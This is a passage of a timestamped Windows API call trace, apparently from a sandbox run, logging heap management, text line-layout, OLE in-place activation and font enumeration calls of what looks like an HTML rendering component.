(HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d97a0 [0160.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d98e0 [0160.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6da6f0 [0160.903] LsFetchAppendToCurrentSubline () returned 0x0 [0160.903] LsFinishCurrentSubline () returned 0x0 [0160.903] LssbGetObjDimSubline () returned 0x0 [0160.903] LsdnSubmitSublines () returned 0x0 [0160.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9908 [0160.904] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6c20 [0160.904] LsdnFinishRegular () returned 0x0 [0160.904] LsQueryLineDup () returned 0x0 [0160.904] LssbFDonePresSubline () returned 0x0 [0160.904] LsGetMinDurBreaks () returned 0x0 [0160.904] LsdnQueryObjDimRange () returned 0x0 [0160.904] LsEnumLine () returned 0x0 [0160.904] LsDestroyLine () returned 0x0 [0160.904] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c20 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9908 | out: hHeap=0x5e0000) returned 1 [0160.905] LsDestroySubline () returned 0x0 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c00 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c28 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2d10 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db358 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ae8 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9778 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d97a0 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d98e0 | out: hHeap=0x5e0000) returned 1 [0160.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ee50 | out: hHeap=0x5e0000) returned 1 [0160.906] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x5e0000) returned 1 [0160.906] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0160.906] IOleInPlaceSite:CanInPlaceActivate (This=0xcfae60) returned 0x0 [0160.906] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.906] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.906] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0160.906] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0160.907] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0160.907] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0160.907] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0160.907] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0160.907] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0160.907] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0160.907] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0160.907] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.907] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6c30 [0160.907] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.907] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.907] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d95d0 [0160.907] HashData (in: pbData=0x6d95d0, cbData=0x1, pbHash=0x196610, cbHash=0x2 | out: pbHash=0x196610) returned 0x0 [0160.907] HashData (in: pbData=0x19660c, cbData=0x4, pbHash=0x196618, cbHash=0x2 | out: pbHash=0x196618) returned 0x0 [0160.907] HashData (in: pbData=0x6d95d4, cbData=0xc, pbHash=0x196614, cbHash=0x2 | out: pbHash=0x196614) returned 0x0 [0160.908] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d95d0 | out: hHeap=0x5e0000) returned 1 [0160.908] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0160.908] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x196610, cbHash=0x2 | out: pbHash=0x196610) returned 0x0 [0160.908] HashData (in: pbData=0x19660c, cbData=0x4, pbHash=0x196618, cbHash=0x2 | out: pbHash=0x196618) returned 0x0 [0160.908] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x196614, cbHash=0x2 | out: pbHash=0x196614) returned 0x0 [0160.908] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0160.908] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.908] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.908] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.909] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c30 | out: hHeap=0x5e0000) returned 1 [0160.909] LsSetDoc () returned 0x0 [0160.909] LsCreateLine () returned 0x0 [0160.909] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.909] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.909] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.909] LsGetRubyLsimethods () returned 0x0 [0160.909] LsGetTatenakayokoLsimethods () returned 0x0 [0160.909] LsGetHihLsimethods () returned 0x0 [0160.909] LsGetWarichuLsimethods () returned 0x0 [0160.909] LsGetReverseLsimethods () returned 0x0 [0160.909] LsCreateContext () returned 0x0 [0160.909] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x9ef8e20 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d8488 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x9ef9498 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d7f18 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x9ef95b0 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9778 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d98e0 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2e60 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db358 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9a20 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c00 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9908 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c28 [0160.910] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x9ef98a0 [0160.911] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.911] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.911] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.911] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x9ef9ca8 [0160.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x67b610 [0160.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x9efbb88 [0160.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x9efbde0 [0160.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x9efbf18 [0160.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x9efc030 [0160.911] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b0a0 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9efc2b0 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x6ce408 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x9efc448 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x68d180 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x9efc540 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64ba60 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9efc6e0 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x9efa490 [0160.912] LsSetModWidthPairs () returned 0x0 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x5f8320 [0160.912] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dc820 [0160.912] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.912] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.952] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.952] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.952] LsSetBreaking () returned 0x0 [0160.952] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x271) returned 0x9efc878 [0160.953] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6d9708 [0160.953] LsSetDoc () returned 0x0 [0160.953] IOleInPlaceFrame:RemoveMenus (This=0xcfaee0, hmenuShared=0x9ef8fcc) returned 0x0 [0160.953] IOleInPlaceFrame:RemoveMenus (This=0xcfaef0, hmenuShared=0x9ef8fcc) returned 0x0 [0160.953] IOleInPlaceFrame:RemoveMenus (This=0xcfaf00, hmenuShared=0x9ef8fcc) returned 0x0 [0160.953] IOleInPlaceFrame:RemoveMenus (This=0xcfaf10, hmenuShared=0x9ef8fcc) returned 0x0 [0160.953] LsCreateLine () returned 0x0 [0160.953] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.953] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.953] LsQueryLineDup () returned 0x0 [0160.953] LsGetMinDurBreaks () returned 0x0 [0160.953] LsEnumLine () returned 0x0 [0160.953] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.953] malloc (_Size=0xb0) returned 0xc58fa0 [0160.953] LsDestroyLine () returned 0x0 [0160.954] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.954] LsdnFinishRegular () returned 0x0 [0160.954] LsQueryLineDup () returned 0x0 [0160.954] IOleInPlaceFrame:SetMenu (This=0xd0f2e0, hmenuShared=0x814c, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0160.954] LsGetMinDurBreaks () returned 0x0 [0160.954] LsdnQueryObjDimRange () returned 0x0 [0160.954] LsEnumLine () returned 0x0 [0160.954] LsQueryLineCpPpoint () returned 0x0 [0160.954] LsDestroyLine () returned 0x0 [0160.954] IOleInPlaceSite:CanInPlaceActivate (This=0xcfae50) returned 0x0 [0160.955] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.955] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.955] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.955] LsSetDoc () returned 0x0 [0160.955] LsCreateLine () returned 0x0 [0160.955] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.955] LsCreateSubline () returned 0x0 [0160.955] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0160.955] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x63ee50 [0160.955] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b10 [0160.955] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b60 [0160.955] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2c68 [0160.956] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db3a0 [0160.956] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d97a0 [0160.956] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d97f0 [0160.956] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b38 [0160.956] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9818 [0160.956] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6da6f0 [0160.956] LsFetchAppendToCurrentSubline () returned 0x0 [0160.956] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.956] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.957] LsFinishCurrentSubline () returned 0x0 [0160.957] LssbGetObjDimSubline () returned 0x0 [0160.957] LsdnSubmitSublines () returned 0x0 [0160.957] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9890 [0160.957] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6d10 [0160.957] LsdnFinishRegular () returned 0x0 [0160.957] LsQueryLineDup () returned 0x0 [0160.957] LssbFDonePresSubline () returned 0x0 [0160.957] LsGetMinDurBreaks () returned 0x0 [0160.957] LsdnQueryObjDimRange () returned 0x0 [0160.957] LsEnumLine () returned 0x0 [0160.957] LsDestroyLine () returned 0x0 [0160.957] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d10 | out: hHeap=0x5e0000) returned 1 [0160.957] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9890 | out: hHeap=0x5e0000) returned 1 [0160.957] LsDestroySubline () returned 0x0 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b10 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b60 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2c68 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db3a0 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d97f0 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d97a0 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b38 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9818 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ee50 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x5e0000) returned 1 [0160.958] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0160.959] IOleInPlaceSite:CanInPlaceActivate (This=0xcfaef0) returned 0x0 [0160.959] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.959] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.959] LsSetDoc () returned 0x0 [0160.959] LsCreateLine () returned 0x0 [0160.959] LsQueryLineDup () returned 0x0 [0160.959] LsGetMinDurBreaks () returned 0x0 [0160.959] LsEnumLine () returned 0x0 [0160.959] LsDestroyLine () returned 0x0 [0160.959] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.959] malloc (_Size=0x180) returned 0xc53b60 [0160.960] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.960] LsSetDoc () returned 0x0 [0160.960] LsCreateLine () returned 0x0 [0160.960] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.960] LsCreateSubline () returned 0x0 [0160.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0160.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x63ee50 [0160.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9958 [0160.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9930 [0160.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2db8 [0160.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db3a0 [0160.961] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b10 [0160.961] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9868 [0160.961] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b88 [0160.961] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d99d0 [0160.961] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6da6f0 [0160.961] LsFetchAppendToCurrentSubline () returned 0x0 [0160.963] LsFinishCurrentSubline () returned 0x0 [0160.963] LssbGetObjDimSubline () returned 0x0 [0160.963] LsdnSubmitSublines () returned 0x0 [0160.963] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9ac0 [0160.963] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6c20 [0160.963] LsdnFinishRegular () returned 0x0 [0160.964] LsQueryLineDup () returned 0x0 [0160.964] LssbFDonePresSubline () returned 0x0 [0160.964] LsGetMinDurBreaks () returned 0x0 [0160.964] LsdnQueryObjDimRange () returned 0x0 [0160.964] LsEnumLine () returned 0x0 [0160.964] LsDestroyLine () returned 0x0 [0160.964] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c20 | out: hHeap=0x5e0000) returned 1 [0160.964] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ac0 | out: hHeap=0x5e0000) returned 1 [0160.964] LsDestroySubline () returned 0x0 [0160.964] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9958 | out: hHeap=0x5e0000) returned 1 [0160.964] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9930 | out: hHeap=0x5e0000) returned 1 [0160.964] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2db8 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db3a0 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9868 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b10 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b88 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d99d0 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ee50 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x5e0000) returned 1 [0160.965] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0160.965] IOleInPlaceSite:CanInPlaceActivate (This=0xcfaef0) returned 0x0 [0160.966] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.966] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.966] OpenThemeDataEx () returned 0x10003 [0160.966] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="sans-serif") returned -6 [0160.966] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="serif") returned -6 [0160.966] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="monospace") returned 4 [0160.967] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="cursive") returned 10 [0160.967] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="fantasy") returned 7 [0160.967] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="inherit") returned 4 [0160.967] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="initial") returned 4 [0160.967] StrCmpICW (pszStr1="MS Shell Dlg", pszStr2="default") returned 9 [0160.967] EnumFontFamiliesExW (hdc=0x33010a5b, lpLogfont=0x195bb8, lpProc=0x6dd71af0, lParam=0x195bb8, dwFlags=0x0) returned 0 [0160.967] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1e) returned 0x6d9b60 [0160.967] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0160.967] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.967] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6c20 [0160.970] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.970] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.970] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.970] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0160.970] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x196630, cbHash=0x2 | out: pbHash=0x196630) returned 0x0 [0160.970] HashData (in: pbData=0x19662c, cbData=0x4, pbHash=0x196638, cbHash=0x2 | out: pbHash=0x196638) returned 0x0 [0160.970] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x196634, cbHash=0x2 | out: pbHash=0x196634) returned 0x0 [0160.970] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0160.970] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0160.970] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x196630, cbHash=0x2 | out: pbHash=0x196630) returned 0x0 [0160.970] HashData (in: pbData=0x19662c, cbData=0x4, pbHash=0x196638, cbHash=0x2 | out: pbHash=0x196638) returned 0x0 [0160.970] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x196634, cbHash=0x2 | out: pbHash=0x196634) returned 0x0 [0160.970] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0160.971] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.971] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.971] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.971] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c20 | out: hHeap=0x5e0000) returned 1 [0160.971] LsSetDoc () returned 0x0 [0160.971] LsCreateLine () returned 0x0 [0160.971] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.975] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.975] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.975] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x114) returned 0x67bd00 [0160.982] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7cb8 [0160.982] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.982] EnumFontsW (hdc=0x33010a5b, lpLogfont="MS Shell Dlg", lpProc=0x6dd7a2b0, lParam=0x1965f8) returned 1 [0160.983] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.983] memcpy_s (in: _Destination=0xcf9690, _DestinationSize=0x1a, _Source=0x196850, _SourceSize=0x18 | out: _Destination=0xcf9690) returned 0x0 [0160.983] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.983] CreateFontIndirectW (lplf=0x196678) returned 0x760a09fd [0160.983] SelectObject (hdc=0x33010a5b, h=0x760a09fd) returned 0x40a0a78 [0160.983] GetTextFaceW (in: hdc=0x33010a5b, c=32, lpName=0x1966d8 | out: lpName="MS Shell Dlg") returned 13 [0160.983] SelectObject (hdc=0x33010a5b, h=0x760a09fd) returned 0x760a09fd [0160.983] GetFontUnicodeRanges (in: hdc=0x33010a5b, lpgs=0x0 | out: lpgs=0x0) returned 0x20c [0160.987] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.987] GetFontUnicodeRanges (in: hdc=0x33010a5b, lpgs=0xd80900 | out: lpgs=0xd80900) returned 0x20c [0160.988] SelectObject (hdc=0x33010a5b, h=0x760a09fd) returned 0x760a09fd [0161.033] LsdnFinishRegular () returned 0x0 [0161.034] LsQueryLineDup () returned 0x0 [0161.034] IOleInPlaceFrame:SetMenu (This=0xd0f300, hmenuShared=0x74cc, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.034] LsGetMinDurBreaks () returned 0x0 [0161.034] LsdnQueryObjDimRange () returned 0x0 [0161.034] LsEnumLine () returned 0x0 [0161.034] LsQueryLineCpPpoint () returned 0x0 [0161.034] LsDestroyLine () returned 0x0 [0161.034] IOleInPlaceSite:CanInPlaceActivate (This=0xcfaee0) returned 0x0 [0161.034] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.034] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x198210, cbHash=0x2 | out: pbHash=0x198210) returned 0x0 [0161.034] HashData (in: pbData=0x19820c, cbData=0x4, pbHash=0x198218, cbHash=0x2 | out: pbHash=0x198218) returned 0x0 [0161.035] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x198214, cbHash=0x2 | out: pbHash=0x198214) returned 0x0 [0161.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.035] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.035] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x198210, cbHash=0x2 | out: pbHash=0x198210) returned 0x0 [0161.035] HashData (in: pbData=0x19820c, cbData=0x4, pbHash=0x198218, cbHash=0x2 | out: pbHash=0x198218) returned 0x0 [0161.035] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x198214, cbHash=0x2 | out: pbHash=0x198214) returned 0x0 [0161.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.035] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.035] MulDiv (nNumber=100, nNumerator=37500, nDenominator=100) returned 37500 [0161.035] MulDiv (nNumber=100, nNumerator=0, nDenominator=37500) returned 0 [0161.035] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.035] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, 